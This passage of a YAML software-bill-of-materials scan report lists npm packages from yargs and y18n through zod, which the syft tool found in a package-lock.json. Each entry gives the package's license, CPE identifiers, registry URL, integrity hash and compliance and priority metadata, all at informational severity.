metadata:
resolved: https://registry.npmjs.org/y18n/-/y18n-4.0.3.tgz
integrity: sha512-JKhqTOwSrqNA1NY5lSztJ1GrBiUodLMmIZuLiDaMRJ+itFd+ABVE8XBjOvIWL+rSqNDC74LCSFmlb/U4UZ4hJQ==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: ff7837262c7a0506
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: y18n 5.0.8'
title: y18n 5.0.8
description: 'Package discovered: y18n 5.0.8'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 17090a29739955b3
name: y18n
version: 5.0.8
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: ISC
spdxExpression: ISC
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:y18n_project:y18n:5.0.8:*:*:*:*:node.js:*:*
source: nvd-cpe-dictionary
purl: pkg:npm/y18n@5.0.8
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/y18n/-/y18n-5.0.8.tgz
integrity: sha512-0pfFzegeDWJHJIAmTLRP2DwHjdF5s7jo9tuztdQxAhINCdvS+3nGINqPd00AphqJR/0LhANUS6/+7SCb98YOfA==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 20985a40c61069a1
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: yallist 4.0.0'
title: yallist 4.0.0
description: 'Package discovered: yallist 4.0.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: c85ae4ebdc6284ae
name: yallist
version: 4.0.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: ISC
spdxExpression: ISC
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:yallist:yallist:4.0.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/yallist@4.0.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz
integrity: sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 71c51c3c7b12c140
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: yargs 15.4.1'
title: yargs 15.4.1
description: 'Package discovered: yargs 15.4.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: bbb181fdab2eb6da
name: yargs
version: 15.4.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:yargs:yargs:15.4.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/yargs@15.4.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/yargs/-/yargs-15.4.1.tgz
integrity: sha512-aePbxDmcYW++PaqBsJ+HYUFwCdv4LVvdnhBy78E57PIor8/OVvhMrADFFEDh8DHDFRv/O9i3lPhsENjO7QX0+A==
dependencies:
cliui: ^6.0.0
decamelize: ^1.2.0
find-up: ^4.1.0
get-caller-file: ^2.0.1
require-directory: ^2.1.1
require-main-filename: ^2.0.0
set-blocking: ^2.0.0
string-width: ^4.2.0
which-module: ^2.0.0
y18n: ^4.0.0
yargs-parser: ^18.1.2
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 96fe97c2b6d8795a
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: yargs 17.7.2'
title: yargs 17.7.2
description: 'Package discovered: yargs 17.7.2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: c2726c8cb18290f2
name: yargs
version: 17.7.2
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:yargs:yargs:17.7.2:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/yargs@17.7.2
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/yargs/-/yargs-17.7.2.tgz
integrity: sha512-7dSzzRQ++CKnNI/krKnYRV7JKKPUXMEh61soaHKg9mrWEhzFWhFnxPxGl+69cD1Ou63C13NUPCnmIcrvqCuM6w==
dependencies:
cliui: ^8.0.1
escalade: ^3.1.1
get-caller-file: ^2.0.5
require-directory: ^2.1.1
string-width: ^4.2.3
y18n: ^5.0.5
yargs-parser: ^21.1.1
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: ee09b685d8bedc8a
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: yargs-parser 18.1.3'
title: yargs-parser 18.1.3
description: 'Package discovered: yargs-parser 18.1.3'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 385fd2e9c795bcc7
name: yargs-parser
version: 18.1.3
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: ISC
spdxExpression: ISC
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:yargs:yargs-parser:18.1.3:*:*:*:*:node.js:*:*
source: nvd-cpe-dictionary
purl: pkg:npm/yargs-parser@18.1.3
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/yargs-parser/-/yargs-parser-18.1.3.tgz
integrity: sha512-o50j0JeToy/4K6OZcaQmW6lyXXKhq7csREXcDwk2omFPJEwUNOVtJKvmDr9EI1fAJZUyZcRF7kxGBWmRXudrCQ==
dependencies:
camelcase: ^5.0.0
decamelize: ^1.2.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: a4ff6cebec5b0be4
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: yargs-parser 21.1.1'
title: yargs-parser 21.1.1
description: 'Package discovered: yargs-parser 21.1.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 95c25d265eed6eaf
name: yargs-parser
version: 21.1.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: ISC
spdxExpression: ISC
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:yargs:yargs-parser:21.1.1:*:*:*:*:node.js:*:*
source: nvd-cpe-dictionary
purl: pkg:npm/yargs-parser@21.1.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/yargs-parser/-/yargs-parser-21.1.1.tgz
integrity: sha512-tVpsJW7DdjecAiFpbIB1e3qxIQsE6NoPc5/eTdrbbIC4h0LVsWhnoa3g+m2HclBIujHzsxZ4VJVA+GUuc2/LBw==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 14bd34194369a5c5
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: yocto-queue 0.1.0'
title: yocto-queue 0.1.0
description: 'Package discovered: yocto-queue 0.1.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 813268dedfe3539f
name: yocto-queue
version: 0.1.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:yocto-queue:yocto-queue:0.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:yocto-queue:yocto_queue:0.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:yocto_queue:yocto-queue:0.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:yocto_queue:yocto_queue:0.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:yocto:yocto-queue:0.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:yocto:yocto_queue:0.1.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/yocto-queue@0.1.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/yocto-queue/-/yocto-queue-0.1.0.tgz
integrity: sha512-rVksvsnNCdJ/ohGc6xgPwyN8eheCxsiLM8mxuE/t/mOVqJewPuO1miLpTHQiRgTKCLexL4MeAFVagts7HmNZ2Q==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 16bb4d5a9e7dc8d3
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: yoga-layout 2.0.1'
title: yoga-layout 2.0.1
description: 'Package discovered: yoga-layout 2.0.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 579e04e050802ec1
name: yoga-layout
version: 2.0.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:yoga-layout:yoga-layout:2.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:yoga-layout:yoga_layout:2.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:yoga_layout:yoga-layout:2.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:yoga_layout:yoga_layout:2.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:yoga:yoga-layout:2.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:yoga:yoga_layout:2.0.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/yoga-layout@2.0.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/yoga-layout/-/yoga-layout-2.0.1.tgz
integrity: sha512-tT/oChyDXelLo2A+UVnlW9GU7CsvFMaEnd9kVFsaiCQonFAXd3xrHhkLYu+suwwosrAEQ746xBU+HvYtm1Zs2Q==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 6ac3ad6fac7a8b51
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: zod 3.25.76'
title: zod 3.25.76
description: 'Package discovered: zod 3.25.76'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: c30d59c73bdda635
name: zod
version: 3.25.76
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:zod:zod:3.25.76:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/zod@3.25.76
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/zod/-/zod-3.25.76.tgz
integrity: sha512-gzUt/qt81nXsFGKIFcC3YnfEAx5NkunCfnDlvuBSSFS02bcXu4Lmea0AFIUwbLWxWPx3d9p8S5QoaujKcNQxcQ==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0